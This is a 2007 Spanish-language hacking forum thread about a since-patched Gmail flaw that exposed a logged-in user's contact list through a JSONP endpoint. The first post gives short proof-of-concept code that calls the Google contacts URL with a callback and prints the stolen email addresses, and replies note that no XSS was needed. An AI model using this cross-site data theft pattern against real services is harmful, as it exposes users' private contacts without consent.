elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
30 Agosto 2008, 09:30  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Gmail: Robar Lista de Contactos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Gmail: Robar Lista de Contactos  (Leído 2514 veces)
Crack_X
Anti-War
Colaborador

Desconectado Desconectado

Mensajes: 2.324


Peace & Love


Ver Perfil WWW
Gmail: Robar Lista de Contactos
« en: 01 Enero 2007, 16:36 »

Se ha descubierto un nuevo bug que permite ver la lista de usuarios que tiene uno en gmail. El problema se debe a que Google guarda esta informacion en un JavaScript luego de que nos logueamos y cualquier web puede llamarla.

Fuente: Digg.com

Codigo Fuente de Exploit:

Código:
<script type="text/javascript">

function google(a){
    var emails;
    emails = "<ol>"
    for(i=0;i<a.Body.Contacts.length;i++){
        mails += "<li>"+a.Body.Contacts[i].Email+"</li>";
     }
 emails += "</ol>"
 document.write(emails);

}
</script>

<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999"></script>

Bug parchado ya.
« Última modificación: 02 Enero 2007, 17:21 por Crack_X » En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
SergioDS

Desconectado Desconectado

Mensajes: 30



Ver Perfil
Re: Gmail: Robar Lista de Contactos
« Respuesta #1 en: 01 Enero 2007, 17:13 »

y como se hace para usar ese xploit? XD
En línea



"Solo Existen 10 tipos de personas, las qe conocen el binario y las que no"
Crack_X
Anti-War
Colaborador

Desconectado Desconectado

Mensajes: 2.324


Peace & Love


Ver Perfil WWW
Re: Gmail: Robar Lista de Contactos
« Respuesta #2 en: 01 Enero 2007, 17:17 »

Hasta el momento creo que solo se le podria sacar provecho mediante un XSS. No conozco un XSS en gmail pero no significa que no existan.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
sirdarckcat
sdc
Moderador
*****
Desconectado Desconectado

Mensajes: 4.491


HAND


Ver Perfil WWW
Re: Gmail: Robar Lista de Contactos
« Respuesta #3 en: 02 Enero 2007, 02:53 »

No se necesitaba de un XSS, simplemente ponias el codigo y los contactos aparecian.. lo mismo paso hace unos meses y denuevo otros 2 meses atras con el mismo tipo de vulnerabilidades.. el uso se AJAX aveces es muy peligroso.. :P

Saludos!!
En línea

Páginas: [1] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC